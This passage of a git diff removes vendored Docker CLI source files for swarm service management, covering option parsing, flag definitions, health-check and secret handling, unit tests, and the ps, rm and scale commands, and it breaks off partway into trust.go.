-	if i.value != nil {
-		return fmt.Sprintf("%v", *i.value)
-	}
-	return ""
-}
-
-// Value returns the uint64
-func (i *Uint64Opt) Value() *uint64 {
-	return i.value
-}
-
-type floatValue float32
-
-func (f *floatValue) Set(s string) error {
-	v, err := strconv.ParseFloat(s, 32)
-	*f = floatValue(v)
-	return err
-}
-
-func (f *floatValue) Type() string {
-	return "float"
-}
-
-func (f *floatValue) String() string {
-	return strconv.FormatFloat(float64(*f), 'g', -1, 32)
-}
-
-func (f *floatValue) Value() float32 {
-	return float32(*f)
-}
-
-// SecretRequestSpec is a type for requesting secrets
-type SecretRequestSpec struct {
-	source string
-	target string
-	uid    string
-	gid    string
-	mode   os.FileMode
-}
-
-// SecretOpt is a Value type for parsing secrets
-type SecretOpt struct {
-	values []*SecretRequestSpec
-}
-
-// Set a new secret value
-func (o *SecretOpt) Set(value string) error {
-	csvReader := csv.NewReader(strings.NewReader(value))
-	fields, err := csvReader.Read()
-	if err != nil {
-		return err
-	}
-
-	spec := &SecretRequestSpec{
-		source: "",
-		target: "",
-		uid:    "0",
-		gid:    "0",
-		mode:   0444,
-	}
-
-	for _, field := range fields {
-		parts := strings.SplitN(field, "=", 2)
-		key := strings.ToLower(parts[0])
-
-		if len(parts) != 2 {
-			return fmt.Errorf("invalid field '%s' must be a key=value pair", field)
-		}
-
-		value := parts[1]
-		switch key {
-		case "source", "src":
-			spec.source = value
-		case "target":
-			tDir, _ := filepath.Split(value)
-			if tDir != "" {
-				return fmt.Errorf("target must not have a path")
-			}
-			spec.target = value
-		case "uid":
-			spec.uid = value
-		case "gid":
-			spec.gid = value
-		case "mode":
-			m, err := strconv.ParseUint(value, 0, 32)
-			if err != nil {
-				return fmt.Errorf("invalid mode specified: %v", err)
-			}
-
-			spec.mode = os.FileMode(m)
-		default:
-			return fmt.Errorf("invalid field in secret request: %s", key)
-		}
-	}
-
-	if spec.source == "" {
-		return fmt.Errorf("source is required")
-	}
-
-	o.values = append(o.values, spec)
-	return nil
-}
-
-// Type returns the type of this option
-func (o *SecretOpt) Type() string {
-	return "secret"
-}
-
-// String returns a string repr of this option
-func (o *SecretOpt) String() string {
-	secrets := []string{}
-	for _, secret := range o.values {
-		repr := fmt.Sprintf("%s -> %s", secret.source, secret.target)
-		secrets = append(secrets, repr)
-	}
-	return strings.Join(secrets, ", ")
-}
-
-// Value returns the secret requests
-func (o *SecretOpt) Value() []*SecretRequestSpec {
-	return o.values
-}
-
-type updateOptions struct {
-	parallelism     uint64
-	delay           time.Duration
-	monitor         time.Duration
-	onFailure       string
-	maxFailureRatio floatValue
-}
-
-type resourceOptions struct {
-	limitCPU      opts.NanoCPUs
-	limitMemBytes memBytes
-	resCPU        opts.NanoCPUs
-	resMemBytes   memBytes
-}
-
-func (r *resourceOptions) ToResourceRequirements() *swarm.ResourceRequirements {
-	return &swarm.ResourceRequirements{
-		Limits: &swarm.Resources{
-			NanoCPUs:    r.limitCPU.Value(),
-			MemoryBytes: r.limitMemBytes.Value(),
-		},
-		Reservations: &swarm.Resources{
-			NanoCPUs:    r.resCPU.Value(),
-			MemoryBytes: r.resMemBytes.Value(),
-		},
-	}
-}
-
-type restartPolicyOptions struct {
-	condition   string
-	delay       DurationOpt
-	maxAttempts Uint64Opt
-	window      DurationOpt
-}
-
-func (r *restartPolicyOptions) ToRestartPolicy() *swarm.RestartPolicy {
-	return &swarm.RestartPolicy{
-		Condition:   swarm.RestartPolicyCondition(r.condition),
-		Delay:       r.delay.Value(),
-		MaxAttempts: r.maxAttempts.Value(),
-		Window:      r.window.Value(),
-	}
-}
-
-func convertNetworks(networks []string) []swarm.NetworkAttachmentConfig {
-	nets := []swarm.NetworkAttachmentConfig{}
-	for _, network := range networks {
-		nets = append(nets, swarm.NetworkAttachmentConfig{Target: network})
-	}
-	return nets
-}
-
-type endpointOptions struct {
-	mode         string
-	publishPorts opts.PortOpt
-}
-
-func (e *endpointOptions) ToEndpointSpec() *swarm.EndpointSpec {
-	return &swarm.EndpointSpec{
-		Mode:  swarm.ResolutionMode(strings.ToLower(e.mode)),
-		Ports: e.publishPorts.Value(),
-	}
-}
-
-type logDriverOptions struct {
-	name string
-	opts opts.ListOpts
-}
-
-func newLogDriverOptions() logDriverOptions {
-	return logDriverOptions{opts: opts.NewListOpts(runconfigopts.ValidateEnv)}
-}
-
-func (ldo *logDriverOptions) toLogDriver() *swarm.Driver {
-	if ldo.name == "" {
-		return nil
-	}
-
-	// set the log driver only if specified.
-	return &swarm.Driver{
-		Name:    ldo.name,
-		Options: runconfigopts.ConvertKVStringsToMap(ldo.opts.GetAll()),
-	}
-}
-
-type healthCheckOptions struct {
-	cmd           string
-	interval      PositiveDurationOpt
-	timeout       PositiveDurationOpt
-	retries       int
-	noHealthcheck bool
-}
-
-func (opts *healthCheckOptions) toHealthConfig() (*container.HealthConfig, error) {
-	var healthConfig *container.HealthConfig
-	haveHealthSettings := opts.cmd != "" ||
-		opts.interval.Value() != nil ||
-		opts.timeout.Value() != nil ||
-		opts.retries != 0
-	if opts.noHealthcheck {
-		if haveHealthSettings {
-			return nil, fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck)
-		}
-		healthConfig = &container.HealthConfig{Test: []string{"NONE"}}
-	} else if haveHealthSettings {
-		var test []string
-		if opts.cmd != "" {
-			test = []string{"CMD-SHELL", opts.cmd}
-		}
-		var interval, timeout time.Duration
-		if ptr := opts.interval.Value(); ptr != nil {
-			interval = *ptr
-		}
-		if ptr := opts.timeout.Value(); ptr != nil {
-			timeout = *ptr
-		}
-		healthConfig = &container.HealthConfig{
-			Test:     test,
-			Interval: interval,
-			Timeout:  timeout,
-			Retries:  opts.retries,
-		}
-	}
-	return healthConfig, nil
-}
-
-// ValidatePort validates a string is in the expected format for a port definition
-func ValidatePort(value string) (string, error) {
-	portMappings, err := nat.ParsePortSpec(value)
-	for _, portMapping := range portMappings {
-		if portMapping.Binding.HostIP != "" {
-			return "", fmt.Errorf("HostIP is not supported by a service.")
-		}
-	}
-	return value, err
-}
-
-// convertExtraHostsToSwarmHosts converts an array of extra hosts in cli
-//     <host>:<ip>
-// into a swarmkit host format:
-//     IP_address canonical_hostname [aliases...]
-// This assumes input value (<host>:<ip>) has already been validated
-func convertExtraHostsToSwarmHosts(extraHosts []string) []string {
-	hosts := []string{}
-	for _, extraHost := range extraHosts {
-		parts := strings.SplitN(extraHost, ":", 2)
-		hosts = append(hosts, fmt.Sprintf("%s %s", parts[1], parts[0]))
-	}
-	return hosts
-}
-
-type serviceOptions struct {
-	name            string
-	labels          opts.ListOpts
-	containerLabels opts.ListOpts
-	image           string
-	args            []string
-	hostname        string
-	env             opts.ListOpts
-	envFile         opts.ListOpts
-	workdir         string
-	user            string
-	groups          opts.ListOpts
-	tty             bool
-	mounts          opts.MountOpt
-	dns             opts.ListOpts
-	dnsSearch       opts.ListOpts
-	dnsOption       opts.ListOpts
-	hosts           opts.ListOpts
-
-	resources resourceOptions
-	stopGrace DurationOpt
-
-	replicas Uint64Opt
-	mode     string
-
-	restartPolicy restartPolicyOptions
-	constraints   opts.ListOpts
-	update        updateOptions
-	networks      opts.ListOpts
-	endpoint      endpointOptions
-
-	registryAuth bool
-
-	logDriver logDriverOptions
-
-	healthcheck healthCheckOptions
-	secrets     opts.SecretOpt
-}
-
-func newServiceOptions() *serviceOptions {
-	return &serviceOptions{
-		labels:          opts.NewListOpts(runconfigopts.ValidateEnv),
-		constraints:     opts.NewListOpts(nil),
-		containerLabels: opts.NewListOpts(runconfigopts.ValidateEnv),
-		env:             opts.NewListOpts(runconfigopts.ValidateEnv),
-		envFile:         opts.NewListOpts(nil),
-		groups:          opts.NewListOpts(nil),
-		logDriver:       newLogDriverOptions(),
-		dns:             opts.NewListOpts(opts.ValidateIPAddress),
-		dnsOption:       opts.NewListOpts(nil),
-		dnsSearch:       opts.NewListOpts(opts.ValidateDNSSearch),
-		hosts:           opts.NewListOpts(runconfigopts.ValidateExtraHost),
-		networks:        opts.NewListOpts(nil),
-	}
-}
-
-func (opts *serviceOptions) ToService() (swarm.ServiceSpec, error) {
-	var service swarm.ServiceSpec
-
-	envVariables, err := runconfigopts.ReadKVStrings(opts.envFile.GetAll(), opts.env.GetAll())
-	if err != nil {
-		return service, err
-	}
-
-	currentEnv := make([]string, 0, len(envVariables))
-	for _, env := range envVariables { // need to process each var, in order
-		k := strings.SplitN(env, "=", 2)[0]
-		for i, current := range currentEnv { // remove duplicates
-			if current == env {
-				continue // no update required, may hide this behind flag to preserve order of envVariables
-			}
-			if strings.HasPrefix(current, k+"=") {
-				currentEnv = append(currentEnv[:i], currentEnv[i+1:]...)
-			}
-		}
-		currentEnv = append(currentEnv, env)
-	}
-
-	service = swarm.ServiceSpec{
-		Annotations: swarm.Annotations{
-			Name:   opts.name,
-			Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()),
-		},
-		TaskTemplate: swarm.TaskSpec{
-			ContainerSpec: swarm.ContainerSpec{
-				Image:    opts.image,
-				Args:     opts.args,
-				Env:      currentEnv,
-				Hostname: opts.hostname,
-				Labels:   runconfigopts.ConvertKVStringsToMap(opts.containerLabels.GetAll()),
-				Dir:      opts.workdir,
-				User:     opts.user,
-				Groups:   opts.groups.GetAll(),
-				TTY:      opts.tty,
-				Mounts:   opts.mounts.Value(),
-				DNSConfig: &swarm.DNSConfig{
-					Nameservers: opts.dns.GetAll(),
-					Search:      opts.dnsSearch.GetAll(),
-					Options:     opts.dnsOption.GetAll(),
-				},
-				Hosts:           convertExtraHostsToSwarmHosts(opts.hosts.GetAll()),
-				StopGracePeriod: opts.stopGrace.Value(),
-				Secrets:         nil,
-			},
-			Networks:      convertNetworks(opts.networks.GetAll()),
-			Resources:     opts.resources.ToResourceRequirements(),
-			RestartPolicy: opts.restartPolicy.ToRestartPolicy(),
-			Placement: &swarm.Placement{
-				Constraints: opts.constraints.GetAll(),
-			},
-			LogDriver: opts.logDriver.toLogDriver(),
-		},
-		Networks: convertNetworks(opts.networks.GetAll()),
-		Mode:     swarm.ServiceMode{},
-		UpdateConfig: &swarm.UpdateConfig{
-			Parallelism:     opts.update.parallelism,
-			Delay:           opts.update.delay,
-			Monitor:         opts.update.monitor,
-			FailureAction:   opts.update.onFailure,
-			MaxFailureRatio: opts.update.maxFailureRatio.Value(),
-		},
-		EndpointSpec: opts.endpoint.ToEndpointSpec(),
-	}
-
-	healthConfig, err := opts.healthcheck.toHealthConfig()
-	if err != nil {
-		return service, err
-	}
-	service.TaskTemplate.ContainerSpec.Healthcheck = healthConfig
-
-	switch opts.mode {
-	case "global":
-		if opts.replicas.Value() != nil {
-			return service, fmt.Errorf("replicas can only be used with replicated mode")
-		}
-
-		service.Mode.Global = &swarm.GlobalService{}
-	case "replicated":
-		service.Mode.Replicated = &swarm.ReplicatedService{
-			Replicas: opts.replicas.Value(),
-		}
-	default:
-		return service, fmt.Errorf("Unknown mode: %s", opts.mode)
-	}
-	return service, nil
-}
-
-// addServiceFlags adds all flags that are common to both `create` and `update`.
-// Any flags that are not common are added separately in the individual command
-func addServiceFlags(cmd *cobra.Command, opts *serviceOptions) {
-	flags := cmd.Flags()
-
-	flags.StringVarP(&opts.workdir, flagWorkdir, "w", "", "Working directory inside the container")
-	flags.StringVarP(&opts.user, flagUser, "u", "", "Username or UID (format: <name|uid>[:<group|gid>])")
-	flags.StringVar(&opts.hostname, flagHostname, "", "Container hostname")
-
-	flags.Var(&opts.resources.limitCPU, flagLimitCPU, "Limit CPUs")
-	flags.Var(&opts.resources.limitMemBytes, flagLimitMemory, "Limit Memory")
-	flags.Var(&opts.resources.resCPU, flagReserveCPU, "Reserve CPUs")
-	flags.Var(&opts.resources.resMemBytes, flagReserveMemory, "Reserve Memory")
-	flags.Var(&opts.stopGrace, flagStopGracePeriod, "Time to wait before force killing a container (ns|us|ms|s|m|h)")
-
-	flags.Var(&opts.replicas, flagReplicas, "Number of tasks")
-
-	flags.StringVar(&opts.restartPolicy.condition, flagRestartCondition, "", "Restart when condition is met (none, on-failure, or any)")
-	flags.Var(&opts.restartPolicy.delay, flagRestartDelay, "Delay between restart attempts (ns|us|ms|s|m|h)")
-	flags.Var(&opts.restartPolicy.maxAttempts, flagRestartMaxAttempts, "Maximum number of restarts before giving up")
-	flags.Var(&opts.restartPolicy.window, flagRestartWindow, "Window used to evaluate the restart policy (ns|us|ms|s|m|h)")
-
-	flags.Uint64Var(&opts.update.parallelism, flagUpdateParallelism, 1, "Maximum number of tasks updated simultaneously (0 to update all at once)")
-	flags.DurationVar(&opts.update.delay, flagUpdateDelay, time.Duration(0), "Delay between updates (ns|us|ms|s|m|h) (default 0s)")
-	flags.DurationVar(&opts.update.monitor, flagUpdateMonitor, time.Duration(0), "Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)")
-	flags.StringVar(&opts.update.onFailure, flagUpdateFailureAction, "pause", "Action on update failure (pause|continue)")
-	flags.Var(&opts.update.maxFailureRatio, flagUpdateMaxFailureRatio, "Failure rate to tolerate during an update")
-
-	flags.StringVar(&opts.endpoint.mode, flagEndpointMode, "", "Endpoint mode (vip or dnsrr)")
-
-	flags.BoolVar(&opts.registryAuth, flagRegistryAuth, false, "Send registry authentication details to swarm agents")
-
-	flags.StringVar(&opts.logDriver.name, flagLogDriver, "", "Logging driver for service")
-	flags.Var(&opts.logDriver.opts, flagLogOpt, "Logging driver options")
-
-	flags.StringVar(&opts.healthcheck.cmd, flagHealthCmd, "", "Command to run to check health")
-	flags.Var(&opts.healthcheck.interval, flagHealthInterval, "Time between running the check (ns|us|ms|s|m|h)")
-	flags.Var(&opts.healthcheck.timeout, flagHealthTimeout, "Maximum time to allow one check to run (ns|us|ms|s|m|h)")
-	flags.IntVar(&opts.healthcheck.retries, flagHealthRetries, 0, "Consecutive failures needed to report unhealthy")
-	flags.BoolVar(&opts.healthcheck.noHealthcheck, flagNoHealthcheck, false, "Disable any container-specified HEALTHCHECK")
-
-	flags.BoolVarP(&opts.tty, flagTTY, "t", false, "Allocate a pseudo-TTY")
-}
-
-const (
-	flagConstraint            = "constraint"
-	flagConstraintRemove      = "constraint-rm"
-	flagConstraintAdd         = "constraint-add"
-	flagContainerLabel        = "container-label"
-	flagContainerLabelRemove  = "container-label-rm"
-	flagContainerLabelAdd     = "container-label-add"
-	flagDNS                   = "dns"
-	flagDNSRemove             = "dns-rm"
-	flagDNSAdd                = "dns-add"
-	flagDNSOption             = "dns-option"
-	flagDNSOptionRemove       = "dns-option-rm"
-	flagDNSOptionAdd          = "dns-option-add"
-	flagDNSSearch             = "dns-search"
-	flagDNSSearchRemove       = "dns-search-rm"
-	flagDNSSearchAdd          = "dns-search-add"
-	flagEndpointMode          = "endpoint-mode"
-	flagHost                  = "host"
-	flagHostAdd               = "host-add"
-	flagHostRemove            = "host-rm"
-	flagHostname              = "hostname"
-	flagEnv                   = "env"
-	flagEnvFile               = "env-file"
-	flagEnvRemove             = "env-rm"
-	flagEnvAdd                = "env-add"
-	flagGroup                 = "group"
-	flagGroupAdd              = "group-add"
-	flagGroupRemove           = "group-rm"
-	flagLabel                 = "label"
-	flagLabelRemove           = "label-rm"
-	flagLabelAdd              = "label-add"
-	flagLimitCPU              = "limit-cpu"
-	flagLimitMemory           = "limit-memory"
-	flagMode                  = "mode"
-	flagMount                 = "mount"
-	flagMountRemove           = "mount-rm"
-	flagMountAdd              = "mount-add"
-	flagName                  = "name"
-	flagNetwork               = "network"
-	flagPublish               = "publish"
-	flagPublishRemove         = "publish-rm"
-	flagPublishAdd            = "publish-add"
-	flagReplicas              = "replicas"
-	flagReserveCPU            = "reserve-cpu"
-	flagReserveMemory         = "reserve-memory"
-	flagRestartCondition      = "restart-condition"
-	flagRestartDelay          = "restart-delay"
-	flagRestartMaxAttempts    = "restart-max-attempts"
-	flagRestartWindow         = "restart-window"
-	flagStopGracePeriod       = "stop-grace-period"
-	flagTTY                   = "tty"
-	flagUpdateDelay           = "update-delay"
-	flagUpdateFailureAction   = "update-failure-action"
-	flagUpdateMaxFailureRatio = "update-max-failure-ratio"
-	flagUpdateMonitor         = "update-monitor"
-	flagUpdateParallelism     = "update-parallelism"
-	flagUser                  = "user"
-	flagWorkdir               = "workdir"
-	flagRegistryAuth          = "with-registry-auth"
-	flagLogDriver             = "log-driver"
-	flagLogOpt                = "log-opt"
-	flagHealthCmd             = "health-cmd"
-	flagHealthInterval        = "health-interval"
-	flagHealthRetries         = "health-retries"
-	flagHealthTimeout         = "health-timeout"
-	flagNoHealthcheck         = "no-healthcheck"
-	flagSecret                = "secret"
-	flagSecretAdd             = "secret-add"
-	flagSecretRemove          = "secret-rm"
-)
diff --git a/vendor/github.com/docker/docker/cli/command/service/opts_test.go b/vendor/github.com/docker/docker/cli/command/service/opts_test.go
deleted file mode 100644
index 78b956ad67..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/opts_test.go
+++ /dev/null
@@ -1,107 +0,0 @@
-package service
-
-import (
-	"reflect"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestMemBytesString(t *testing.T) {
-	var mem memBytes = 1048576
-	assert.Equal(t, mem.String(), "1 MiB")
-}
-
-func TestMemBytesSetAndValue(t *testing.T) {
-	var mem memBytes
-	assert.NilError(t, mem.Set("5kb"))
-	assert.Equal(t, mem.Value(), int64(5120))
-}
-
-func TestNanoCPUsString(t *testing.T) {
-	var cpus opts.NanoCPUs = 6100000000
-	assert.Equal(t, cpus.String(), "6.100")
-}
-
-func TestNanoCPUsSetAndValue(t *testing.T) {
-	var cpus opts.NanoCPUs
-	assert.NilError(t, cpus.Set("0.35"))
-	assert.Equal(t, cpus.Value(), int64(350000000))
-}
-
-func TestDurationOptString(t *testing.T) {
-	dur := time.Duration(300 * 10e8)
-	duration := DurationOpt{value: &dur}
-	assert.Equal(t, duration.String(), "5m0s")
-}
-
-func TestDurationOptSetAndValue(t *testing.T) {
-	var duration DurationOpt
-	assert.NilError(t, duration.Set("300s"))
-	assert.Equal(t, *duration.Value(), time.Duration(300*10e8))
-	assert.NilError(t, duration.Set("-300s"))
-	assert.Equal(t, *duration.Value(), time.Duration(-300*10e8))
-}
-
-func TestPositiveDurationOptSetAndValue(t *testing.T) {
-	var duration PositiveDurationOpt
-	assert.NilError(t, duration.Set("300s"))
-	assert.Equal(t, *duration.Value(), time.Duration(300*10e8))
-	assert.Error(t, duration.Set("-300s"), "cannot be negative")
-}
-
-func TestUint64OptString(t *testing.T) {
-	value := uint64(2345678)
-	opt := Uint64Opt{value: &value}
-	assert.Equal(t, opt.String(), "2345678")
-
-	opt = Uint64Opt{}
-	assert.Equal(t, opt.String(), "")
-}
-
-func TestUint64OptSetAndValue(t *testing.T) {
-	var opt Uint64Opt
-	assert.NilError(t, opt.Set("14445"))
-	assert.Equal(t, *opt.Value(), uint64(14445))
-}
-
-func TestHealthCheckOptionsToHealthConfig(t *testing.T) {
-	dur := time.Second
-	opt := healthCheckOptions{
-		cmd:      "curl",
-		interval: PositiveDurationOpt{DurationOpt{value: &dur}},
-		timeout:  PositiveDurationOpt{DurationOpt{value: &dur}},
-		retries:  10,
-	}
-	config, err := opt.toHealthConfig()
-	assert.NilError(t, err)
-	assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{
-		Test:     []string{"CMD-SHELL", "curl"},
-		Interval: time.Second,
-		Timeout:  time.Second,
-		Retries:  10,
-	}), true)
-}
-
-func TestHealthCheckOptionsToHealthConfigNoHealthcheck(t *testing.T) {
-	opt := healthCheckOptions{
-		noHealthcheck: true,
-	}
-	config, err := opt.toHealthConfig()
-	assert.NilError(t, err)
-	assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{
-		Test: []string{"NONE"},
-	}), true)
-}
-
-func TestHealthCheckOptionsToHealthConfigConflict(t *testing.T) {
-	opt := healthCheckOptions{
-		cmd:           "curl",
-		noHealthcheck: true,
-	}
-	_, err := opt.toHealthConfig()
-	assert.Error(t, err, "--no-healthcheck conflicts with --health-* options")
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/parse.go b/vendor/github.com/docker/docker/cli/command/service/parse.go
deleted file mode 100644
index ce9b454edd..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/parse.go
+++ /dev/null
@@ -1,68 +0,0 @@
-package service
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/filters"
-	swarmtypes "github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/client"
-	"golang.org/x/net/context"
-)
-
-// ParseSecrets retrieves the secrets from the requested names and converts
-// them to secret references to use with the spec
-func ParseSecrets(client client.SecretAPIClient, requestedSecrets []*types.SecretRequestOption) ([]*swarmtypes.SecretReference, error) {
-	secretRefs := make(map[string]*swarmtypes.SecretReference)
-	ctx := context.Background()
-
-	for _, secret := range requestedSecrets {
-		if _, exists := secretRefs[secret.Target]; exists {
-			return nil, fmt.Errorf("duplicate secret target for %s not allowed", secret.Source)
-		}
-		secretRef := &swarmtypes.SecretReference{
-			File: &swarmtypes.SecretReferenceFileTarget{
-				Name: secret.Target,
-				UID:  secret.UID,
-				GID:  secret.GID,
-				Mode: secret.Mode,
-			},
-			SecretName: secret.Source,
-		}
-
-		secretRefs[secret.Target] = secretRef
-	}
-
-	args := filters.NewArgs()
-	for _, s := range secretRefs {
-		args.Add("names", s.SecretName)
-	}
-
-	secrets, err := client.SecretList(ctx, types.SecretListOptions{
-		Filters: args,
-	})
-	if err != nil {
-		return nil, err
-	}
-
-	foundSecrets := make(map[string]string)
-	for _, secret := range secrets {
-		foundSecrets[secret.Spec.Annotations.Name] = secret.ID
-	}
-
-	addedSecrets := []*swarmtypes.SecretReference{}
-
-	for _, ref := range secretRefs {
-		id, ok := foundSecrets[ref.SecretName]
-		if !ok {
-			return nil, fmt.Errorf("secret not found: %s", ref.SecretName)
-		}
-
-		// set the id for the ref to properly assign in swarm
-		// since swarm needs the ID instead of the name
-		ref.SecretID = id
-		addedSecrets = append(addedSecrets, ref)
-	}
-
-	return addedSecrets, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/ps.go b/vendor/github.com/docker/docker/cli/command/service/ps.go
deleted file mode 100644
index cf94ad7374..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/ps.go
+++ /dev/null
@@ -1,76 +0,0 @@
-package service
-
-import (
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/idresolver"
-	"github.com/docker/docker/cli/command/node"
-	"github.com/docker/docker/cli/command/task"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type psOptions struct {
-	serviceID string
-	quiet     bool
-	noResolve bool
-	noTrunc   bool
-	filter    opts.FilterOpt
-}
-
-func newPsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := psOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "ps [OPTIONS] SERVICE",
-		Short: "List the tasks of a service",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.serviceID = args[0]
-			return runPS(dockerCli, opts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display task IDs")
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output")
-	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func runPS(dockerCli *command.DockerCli, opts psOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	service, _, err := client.ServiceInspectWithRaw(ctx, opts.serviceID)
-	if err != nil {
-		return err
-	}
-
-	filter := opts.filter.Value()
-	filter.Add("service", service.ID)
-	if filter.Include("node") {
-		nodeFilters := filter.Get("node")
-		for _, nodeFilter := range nodeFilters {
-			nodeReference, err := node.Reference(ctx, client, nodeFilter)
-			if err != nil {
-				return err
-			}
-			filter.Del("node", nodeFilter)
-			filter.Add("node", nodeReference)
-		}
-	}
-
-	tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter})
-	if err != nil {
-		return err
-	}
-
-	if opts.quiet {
-		return task.PrintQuiet(dockerCli, tasks)
-	}
-	return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/remove.go b/vendor/github.com/docker/docker/cli/command/service/remove.go
deleted file mode 100644
index c3fbbabbca..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/remove.go
+++ /dev/null
@@ -1,47 +0,0 @@
-package service
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-
-	cmd := &cobra.Command{
-		Use:     "rm SERVICE [SERVICE...]",
-		Aliases: []string{"remove"},
-		Short:   "Remove one or more services",
-		Args:    cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runRemove(dockerCli, args)
-		},
-	}
-	cmd.Flags()
-
-	return cmd
-}
-
-func runRemove(dockerCli *command.DockerCli, sids []string) error {
-	client := dockerCli.Client()
-
-	ctx := context.Background()
-
-	var errs []string
-	for _, sid := range sids {
-		err := client.ServiceRemove(ctx, sid)
-		if err != nil {
-			errs = append(errs, err.Error())
-			continue
-		}
-		fmt.Fprintf(dockerCli.Out(), "%s\n", sid)
-	}
-	if len(errs) > 0 {
-		return fmt.Errorf(strings.Join(errs, "\n"))
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/scale.go b/vendor/github.com/docker/docker/cli/command/service/scale.go
deleted file mode 100644
index cf89e90273..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/scale.go
+++ /dev/null
@@ -1,96 +0,0 @@
-package service
-
-import (
-	"fmt"
-	"strconv"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-func newScaleCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return &cobra.Command{
-		Use:   "scale SERVICE=REPLICAS [SERVICE=REPLICAS...]",
-		Short: "Scale one or multiple replicated services",
-		Args:  scaleArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runScale(dockerCli, args)
-		},
-	}
-}
-
-func scaleArgs(cmd *cobra.Command, args []string) error {
-	if err := cli.RequiresMinArgs(1)(cmd, args); err != nil {
-		return err
-	}
-	for _, arg := range args {
-		if parts := strings.SplitN(arg, "=", 2); len(parts) != 2 {
-			return fmt.Errorf(
-				"Invalid scale specifier '%s'.\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
-				arg,
-				cmd.CommandPath(),
-				cmd.UseLine(),
-				cmd.Short,
-			)
-		}
-	}
-	return nil
-}
-
-func runScale(dockerCli *command.DockerCli, args []string) error {
-	var errors []string
-	for _, arg := range args {
-		parts := strings.SplitN(arg, "=", 2)
-		serviceID, scaleStr := parts[0], parts[1]
-
-		// validate input arg scale number
-		scale, err := strconv.ParseUint(scaleStr, 10, 64)
-		if err != nil {
-			errors = append(errors, fmt.Sprintf("%s: invalid replicas value %s: %v", serviceID, scaleStr, err))
-			continue
-		}
-
-		if err := runServiceScale(dockerCli, serviceID, scale); err != nil {
-			errors = append(errors, fmt.Sprintf("%s: %v", serviceID, err))
-		}
-	}
-
-	if len(errors) == 0 {
-		return nil
-	}
-	return fmt.Errorf(strings.Join(errors, "\n"))
-}
-
-func runServiceScale(dockerCli *command.DockerCli, serviceID string, scale uint64) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	service, _, err := client.ServiceInspectWithRaw(ctx, serviceID)
-	if err != nil {
-		return err
-	}
-
-	serviceMode := &service.Spec.Mode
-	if serviceMode.Replicated == nil {
-		return fmt.Errorf("scale can only be used with replicated mode")
-	}
-
-	serviceMode.Replicated.Replicas = &scale
-
-	response, err := client.ServiceUpdate(ctx, service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{})
-	if err != nil {
-		return err
-	}
-
-	for _, warning := range response.Warnings {
-		fmt.Fprintln(dockerCli.Err(), warning)
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "%s scaled to %d\n", serviceID, scale)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/service/trust.go b/vendor/github.com/docker/docker/cli/command/service/trust.go
deleted file mode 100644
index 052d49c32a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/service/trust.go
+++ /dev/null
@@ -1,96 +0,0 @@
-package service
-
-import (
-	"encoding/hex"
-	"fmt"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
-	distreference "github.com/docker/distribution/reference"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/trust"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-	"github.com/docker/notary/tuf/data"
-	"github.com/pkg/errors"
-	"golang.org/x/net/context"
-)
-
-func resolveServiceImageDigest(dockerCli *command.DockerCli, service *swarm.ServiceSpec) error {
-	if !command.IsTrusted() {
-		// Digests are resolved by the daemon when not using content
-		// trust.
-		return nil
-	}
-
-	image := service.TaskTemplate.ContainerSpec.Image
-
-	// We only attempt to resolve the digest if the reference
